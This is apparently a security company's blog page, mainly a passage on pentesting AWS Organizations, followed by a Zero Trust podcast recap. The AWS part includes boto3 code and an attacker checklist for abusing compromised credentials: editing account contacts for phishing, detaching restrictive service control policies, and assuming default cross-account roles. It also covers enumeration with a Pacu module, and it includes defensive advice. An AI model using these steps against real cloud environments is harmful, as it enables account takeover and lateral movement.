The additional steps performed by penetration testing help internal teams discover deeper issues within their environment, prioritize risks, and remediate gaps. Compliance frameworks have recognized how important pentests are, with several of them, including PCI DSS, FedRAMP, and HITRUST, requiring penetration testing annually and whenever significant changes occur.  

Compliance doesn’t equate to security, but these well-known frameworks are a strong starting point. Keep growing your security compliance education by listening to Marc’s podcast episode here.

Back

Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration

As mentioned in part one of this two-part blog series on pentesting AWS Organizations, a singular mindset with regard to AWS account takeovers might result in missed opportunities in larger corporate environments, specifically those that leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.   

To help mitigate this risk, I pulled from my experience in AWS penetration testing to provide an in-depth explanation of key techniques pentesting teams can use to identify weaknesses in AWS Organizations. 

Read part one to explore organizations, trusted access, and delegated administration, starting with the initial “easy win” via created (as opposed to invited) member accounts and diving into various pivoting techniques. 

In this section, we will cover additional and newer AWS Organizations security implications and demonstrate a new Pacu module I created for ease of enumeration. 


Phishing with AWS Account Management

AWS Account Management is an organization-integrated feature that offers a few simple APIs for updating or retrieving an AWS account’s contact information. This presents an interesting phishing vector.

Assuming we have compromised Account A, enable trusted access for Account Management via the CLI. Note that Account Management supports delegated administration as well, but we are focusing on trusted access for this portion.

Figure 1: Enable Trusted Access
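
Figure 1 shows the CLI call; a rough boto3 equivalent is sketched below, run with Account A's (management account) credentials. The account.amazonaws.com service principal is an assumption based on the Account Management integration name:

import boto3

# Run with the compromised credentials for Account A (the management account)
orgs = boto3.client("organizations")

# Enable trusted access for the AWS Account Management service
orgs.enable_aws_service_access(ServicePrincipal="account.amazonaws.com")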

With trusted access now enabled, update the contact information for Account B, changing items like the address or full name to assist in a future social engineering attack. Note: I have not attempted social engineering with AWS by calling the AWS help desk or other contacts, nor am I sanctioning that. This would be more from the perspective of trying to trick an engineer or another representative who manages an AWS account at the company in order to get access.

Figure 2: Update Member Account Contact Information
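
A sketch of the same contact update against the Account Management API is shown below; the contact values are hypothetical, the account ID placeholder stands in for Account B, and the exact field set is an assumption:

import boto3

account = boto3.client("account")

# Overwrite Account B's contact details to support later social engineering
account.put_contact_information(
    AccountId="<ACCOUNT_B_ID>",
    ContactInformation={
        "FullName": "Jane Attacker",
        "AddressLine1": "123 Example St",
        "City": "Minneapolis",
        "StateOrRegion": "MN",
        "PostalCode": "55401",
        "CountryCode": "US",
        "PhoneNumber": "+15555550100",
    },
)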

Delegated Policies – New Features, New Security Risks

AWS Organizations recently announced a new delegated administrator feature on November 27, 2022.  To summarize this release, AWS Organizations now gives you the ability to grant your delegated administrators more API privileges on top of the read-only access they previously gained by default. Only a subset of the Organization APIs dealing primarily with policy manipulation can be allow-listed for delegated administrators, and the allow-list implementation happens in the management account itself.  

In the image below, we used Account A to attach a Service Control Policy (SCP) to Account C that specifically denies S3 actions. An SCP can be thought of as an Identity and Access Management (IAM) policy filter. SCPs can be attached to accounts (like below) or organizational units (OUs) and propagate downwards through the overall organization hierarchy. They override any IAM privileges at the user/role level for the accounts they are attached to. So even if users or roles in Account C have policies normally granting them S3 actions, they would still be blocked from calling S3 actions, as the SCP at the organization level takes precedence.  

Given this setup and the newly released feature, if a management account grants delegated administrators overly permissive rights in terms of policy access/manipulation, delegated administrators could remove restrictive SCPs from their own account or other accounts they control.

Figure 2: SCP Attached to Account C by Account A
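
For reference, the deny-S3 SCP and its attachment could be reproduced from Account A with a sketch like the one below; the policy name, description, and statement are placeholders, and the actual policy in the figure may differ:

import json
import boto3

orgs = boto3.client("organizations")

# Create an SCP that denies all S3 actions (placeholder statement)
scp = orgs.create_policy(
    Name="DenyS3",
    Description="Deny all S3 actions",
    Type="SERVICE_CONTROL_POLICY",
    Content=json.dumps({
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Deny", "Action": "s3:*", "Resource": "*"}],
    }),
)

# Attach the SCP directly to Account C
orgs.attach_policy(
    PolicyId=scp["Policy"]["PolicySummary"]["Id"],
    TargetId="<ACCOUNT_C_ID>",
)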

To enable the newer feature, navigate to the Settings tab in Account A and click “Delegate” in the “Delegated administrator for AWS Organizations” panel. In the delegation policy’s “Action” key, add Organizations APIs from the subset provided in the AWS user guide.

Note that the actions added include the API calls for attaching and detaching any policy (AttachPolicy/DetachPolicy). Once the actions have been chosen, they are only granted to the member account if the delegation policy lists the member account number as a Principal (Account C in this scenario).

Figure 3: Allowing Policy Management by Delegated Administrators
Figure 4: Create Policy To be Applied to Delegated Administrators
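
The console’s “Delegate” workflow is backed by an organizations resource (delegation) policy. The sketch below shows roughly what Account A ends up applying; the account ID, Sid, and exact action list are placeholders, and the put_resource_policy call is an assumption about how the console change could be reproduced programmatically:

import json
import boto3

orgs = boto3.client("organizations")

# Delegation policy granting Account C (the delegated administrator) the ability
# to attach/detach policies on top of its default read-only access
delegation_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DelegatePolicyManagement",
        "Effect": "Allow",
        "Principal": {"AWS": "<ACCOUNT_C_ID>"},
        "Action": [
            "organizations:AttachPolicy",
            "organizations:DetachPolicy",
            "organizations:ListPoliciesForTarget",
        ],
        "Resource": "*",
    }],
}

# Applied from the management account (Account A)
orgs.put_resource_policy(Content=json.dumps(delegation_policy))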

With this setup complete, we can switch to the attacker’s perspective. Assume that we have compromised credentials for Account C and already noted through reconnaissance that the compromised account is a delegated administrator. At this point in our assessment, we want to get access to S3 data but keep getting denied as seen below in Figure 4.

Figure 4: Try to list S3 Buckets as Account C

This makes sense, as there is an SCP attached to Account C preventing S3 actions. But wait… with the new AWS Organizations feature, we as delegated admins might have additional privileges related to policy management that are not immediately evident. So, while still in Account C’s AWS Organizations service, try to remove the SCP created by Account A from Account C.

Figure 5: View Attached Policies and Try to Detach as Account C
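
From the attacker’s perspective in Account C, the check-and-detach shown in Figure 5 can be scripted. A minimal sketch, with the policy name carried over from the earlier placeholder and the account ID as a stand-in:

import boto3

# Run with the compromised credentials for Account C (the delegated administrator)
orgs = boto3.client("organizations")

# List the SCPs attached to our own account
attached = orgs.list_policies_for_target(
    TargetId="<ACCOUNT_C_ID>",
    Filter="SERVICE_CONTROL_POLICY",
)["Policies"]

# Detach the deny-S3 SCP that Account A attached to us
for policy in attached:
    if policy["Name"] == "DenyS3":  # placeholder name from the earlier sketch
        orgs.detach_policy(PolicyId=policy["Id"], TargetId="<ACCOUNT_C_ID>")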

Since the management account delegated us the rights to detach policy, the operation is successful, and we can now call S3 APIs as seen below in Figure 6. 

Figure 6: Observe Successful Detachment as Account C
Figure 7: List S3 Buckets as Account C

Rather than a trial-and-error method, you could also call the “describe-resource-policy” API as Account C and pull down the policy that exists in Account A. Remember that delegated administrators have read-only access by default so this should be possible unless otherwise restricted.

Figure 8: Retrieve Delegation Policy Defined in Account A as Account C
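
A short sketch of pulling the delegation policy down as Account C, assuming the default read-only access has not been restricted and that the policy document is returned in a Content field:

import json
import boto3

# Run as Account C: read the delegation policy defined in the management account
orgs = boto3.client("organizations")
resp = orgs.describe_resource_policy()

# Print the policy document to see exactly which APIs were delegated to us
print(json.dumps(json.loads(resp["ResourcePolicy"]["Content"]), indent=2))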

Enumeration Tool for AWS Organizations

A lot of what I covered is based on AWS Organizations enumeration. If you compromise an AWS account, you will want to list all organization-related entities to understand the landscape for delegation and the general organization structure (assuming your account is even in an organization).  

To better assist in pentesting AWS Organizations, I added AWS Organizations support to the open-source AWS pentesting tool Pacu. I also wrote an additional Pacu enumeration module for AWS Organizations (organizations__enum). These changes were recently accepted into the Pacu GitHub project and are also available in the traditional pip3 installation procedure detailed in the repository’s README. The two relevant forks are located here:

Note that the GitHub Pacu project contains all APIs discussed thus far, but as you might notice in the screenshots below, the pip installation does not yet include one read-only API (describe-resource-policy) along with one or two bug fixes.

I won’t cover how Pacu works as there is plenty of documentation for the tool, but I will run my module from the perspective of a management account and a normal (not a delegated administrator) member account.  

Let’s first run Pacu with respect to Account A. Note that the module collects many associated attributes ranging from a general organization description to delegation data. To see the collected data after running “organizations__enum,” you need to execute “data organizations.” My module also tries to build a visual graph at the end of the enumeration using the account.

Figure 9: Gather Organization Data from Account A
Figure 10: Data Gathered from Account A
Figure 11: View Organization Data & Graph from Account A

At the other extreme, what if the account in question is a member account with no associated delegation? In this case, the module will still pick up the general description of the organization but will not dump all the organization data since your credentials do not have the necessary API permissions. At the very least, this would help tell you at a glance if the account in question is part of an organization. 

Figure 12: Gather Organization Data from Account B
Figure 13: Data Gathered from Account B

Defense

The content discussed above does not involve any novel zero-days, nor does it represent an inherent flaw in AWS itself. The root cause of most of these problems is exposed cleartext credentials and a lack of least privilege. The cleartext credentials give an attacker access to the AWS account, with trusted access and delegated administration allowing for easy pivoting.  

As mentioned in part one, consider a layered defense. Ensure that IAM users/roles adhere to a least privilege methodology, and that organization-integrated features are monitored and not enabled if not needed. In all cases, protect AWS credentials: exposed credentials give someone access to the AWS environment, allowing them to enumerate the existing resources using a module like the Pacu one above and subsequently exploit any pivoting vectors. To get a complete picture of the organization's actions, ensure proper logging is in place as well. 

The following AWS articles provide guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.  

Final Thoughts & Conclusion

The architecture and considerable number of enabled/delegated service possibilities in AWS Organizations present a serious vector for lateral movement within corporate environments. This could easily turn a single AWS account takeover into a multiple-account takeover that might cross accepted software deployment boundaries (i.e., pre-production and production). More importantly, a lot of the examples given above assume you have compromised a single user or role that allowed for complete control over a given AWS account. In reality, you might find yourself in a situation where permissions are more granular, so perhaps one compromised user/role has the permissions to enable a service, while another user/role has the permissions to call the enabled service on the organization, and so on.  

We covered a lot in this two-part series on pivoting clouds in AWS Organizations. To summarize the key learnings and assist in your own replication, here’s a procedural checklist to follow: 

  1. Compromise a set of AWS credentials for a user or role in the compromised AWS Account. 
  2. Try to determine if you are the management account, a delegated administrator account, a default member account, or an account not part of an organization. If possible, try to run the Pacu “organizations__enum” module to gather all necessary details in one command.
  3. If you are the management account, go through each member account and try to assume the default role (see the sketch after this list). Consider a wordlist with OrganizationAccountAccessRole included. You can also try to leverage any existing enabled services with IAM Identity Center being the desired service. If necessary, you can also check if there are any delegated administrators you have control over that might assist in pivoting. 
  4. If you are a delegated administrator, check for associated delegated services to exploit similar to enabled services or try to alter existing SCPs to grant yourself or other accounts more permissions. If necessary, you can also check if there are any other delegated administrators you have control over that might assist in pivoting. 
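
For step 3 above, the default-role check can be scripted. Here is a minimal boto3 sketch, assuming the compromised management account credentials are configured; pagination is ignored for brevity and the session name is arbitrary:

import boto3

sts = boto3.client("sts")
orgs = boto3.client("organizations")

# Enumerate member accounts from the (compromised) management account
accounts = orgs.list_accounts()["Accounts"]

for acct in accounts:
    role_arn = f"arn:aws:iam::{acct['Id']}:role/OrganizationAccountAccessRole"
    try:
        # Try to assume the default cross-account role created in member accounts
        sts.assume_role(RoleArn=role_arn, RoleSessionName="org-pivot-check")
        print(f"[+] Assumed {role_arn}")
    except Exception:
        print(f"[-] Could not assume {role_arn}")
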
Back

3 Misconceptions with Zero Trust Implementation

On Episode 46 of NetSPI’s Agent of Influence podcast, host and NetSPI Field Chief Information Security Officer (CISO) Nabil Hannan invited Hudl CISO Rob LaMagna-Reiter to discuss a future-focused approach to Zero Trust. They cover three misconceptions IT teams typically encounter throughout Zero Trust implementation, as well as broader topics including the definition of Zero Trust, reputable frameworks to reference, and long-term budgeting for an enhanced cybersecurity strategy. Read the recap below for the top takeaways, then head over to our podcast page to listen to the full episode. 

3 Misconceptions of Zero Trust Implementation 

One of the conversations on this episode centered around common misconceptions teams face when they plan for Zero Trust. The modern cybersecurity model presents universal challenges that can stall organizations' progress on the path to a stronger security end state. Help internal teams move beyond these common blockers and continue momentum on security initiatives by learning about the counterpoints to Zero Trust misconceptions. 

Misconception #1: Zero Trust is identity, or Zero Trust is the new perimeter. 

Truth: Identity is an important aspect of Zero Trust, but no singular pillar comprises Zero Trust.

The chatter around Zero Trust is dense, leading to mixed messages around what Zero Trust is and isn't. Vendors can perpetuate this confusion by labeling products as Zero Trust or selling a one-and-done solution that promises relentless security. While identity is an important pillar in Zero Trust, it is only one aspect of the overarching strategy. Having too narrow a focus on a singular pillar leaves gaps in Zero Trust implementation, keeping your company in the crosshairs of a potential breach. 

Misconception #2: Zero Trust is a product. 

Truth: Zero Trust is a methodology to achieve a greater end state of cybersecurity.

Again, the varied messages about Zero Trust from vendors who sell a single solution dilute its meaning as an overall strategy. Zero Trust is not a product or a platform, and no single solution can achieve Zero Trust. It is a framework for organizations to approach more secure systems and align their internal thinking to systematically enhance security across many areas of a business. 

Misconception #3: Zero Trust is a complicated dream state that isn’t possible to achieve. 

Truth: Taking incremental steps toward Zero Trust by following a roadmap tailored to your organization decreases the intimidation of Zero Trust and provides quick wins to build momentum for continued progress.

This is the most common misconception we hear in conversations. Zero Trust is complex, and when trying to solve for everything at once, it can seem overwhelming. Following a Zero Trust roadmap with relevant KPIs tailored to your organization is the key to success. This can include mapping out data flows and the attack surface, and building a strategy around identifying, classifying, and tagging critical applications.  

“The most complicated thing about Zero Trust is it actually forces you to understand your business deeply. It forces you to know more about the business than the business might know about itself.” 

– Rob LaMagna-Reiter, CISO at Hudl

While many misconceptions about Zero Trust exist, these three examples present nearly universal scenarios for any company aspiring to implement Zero Trust or continue its expansion. Zero Trust is a complex methodology, but internal teams can find support by partnering with technology vendors who specialize in cybersecurity. 

Plan for Zero Trust Implementation Guidance Tailored to Your Business Goals 

Zero Trust implementation uncovers what is normal and what isn’t for any business. This deep understanding allows for the creation of a strategy to guide the development of steps within Zero Trust, while remaining flexible to adapt to the business as it evolves.

Listen to the full interview on episode 46 of the Agent of Influence podcast where we expand on how to talk with internal stakeholders about Zero Trust in ways that resonate with them. If you’re ready to make progress on your Zero Trust implementation, contact NetSPI’s Strategic Advisory team to get started.
